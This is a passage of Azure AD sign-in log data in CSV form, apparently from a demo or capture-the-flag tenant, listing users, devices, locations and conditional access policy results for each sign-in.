'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:04,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",2142ba09-4978-409c-a3ee-57a723f64800,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,2142ba09-4978-409c-a3ee-57a723f64800,SigninLogs,Sucess,32.32146072,34.85319901
+698,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:05.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4fd694de-5895-4514-9729-2a675a82f669,Microsoft.aadiam,Microsoft.aadiam,,Anthony Roman,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:24,"{'operatingSystem': 'Windows 10', 'deviceId': '0b9d11a7-b5c6-48c5-898e-b62fde94f3b0', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-II6P5U4', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",7c60d40c-3eaf-4795-a540-27d03eba6b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -75.16385650634764, 'latitude': 39.94686126708984}, 'state': 'Pennsylvania', 'city': 'Philadelphia'}",none,none,none,none,[],{'errorCode': 0},Anthony Roman,2b2e5983-18b7-4b63-b87e-34de934cc906,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7c60d40c-3eaf-4795-a540-27d03eba6b00,SigninLogs,Sucess,39.94686127,-75.16385651
+699,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:52.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cd44f1a4-3470-42be-b6cc-25bcee1a9015,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:33,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",d16ce29f-69c9-4fdc-aaad-2002e20d4e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,d16ce29f-69c9-4fdc-aaad-2002e20d4e00,SigninLogs,Sucess,32.32146072,34.85319901
+700,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:08.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,498e8450-d9fb-408d-b901-77918dd6cc24,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:24,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",8c440a42-cabc-4ff3-b969-9ddd3aa54000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,8c440a42-cabc-4ff3-b969-9ddd3aa54000,SigninLogs,Sucess,32.32146072,34.85319901
+701,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:06.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b5b1cf6c-ca8d-40b0-9bfc-a8a3cf1f024a,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",2dbc1600-fa29-49de-af67-71cf1fb31500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -96.76923370361328, 'latitude': 33.16151809692383}, 'state': 'Texas', 'city': 'Frisco'}",none,none,none,none,[],{'errorCode': 0},CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,2dbc1600-fa29-49de-af67-71cf1fb31500,SigninLogs,Sucess,33.1615181,-96.7692337
+702,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:02.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b4563623-970b-4af7-a8c7-a97237b64b23,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:04,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",2142ba09-4978-409c-a3ee-57a723f64800,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,2142ba09-4978-409c-a3ee-57a723f64800,SigninLogs,Sucess,32.32146072,34.85319901
+703,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:20.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5aaa468b-6299-42ac-808e-87af21ed8e32,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",0837a9e3-f941-4973-a561-a80d08391600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0837a9e3-f941-4973-a561-a80d08391600,SigninLogs,Sucess,36.6404686,-78.26995087
+704,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:00.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ef98704-2b5d-459c-92c8-6f37e0c71c74,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",a9f59943-bd83-455b-86cd-4cf1d4fe1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,a9f59943-bd83-455b-86cd-4cf1d4fe1400,SigninLogs,Sucess,33.7984581,-84.38828278
+705,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:26.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': 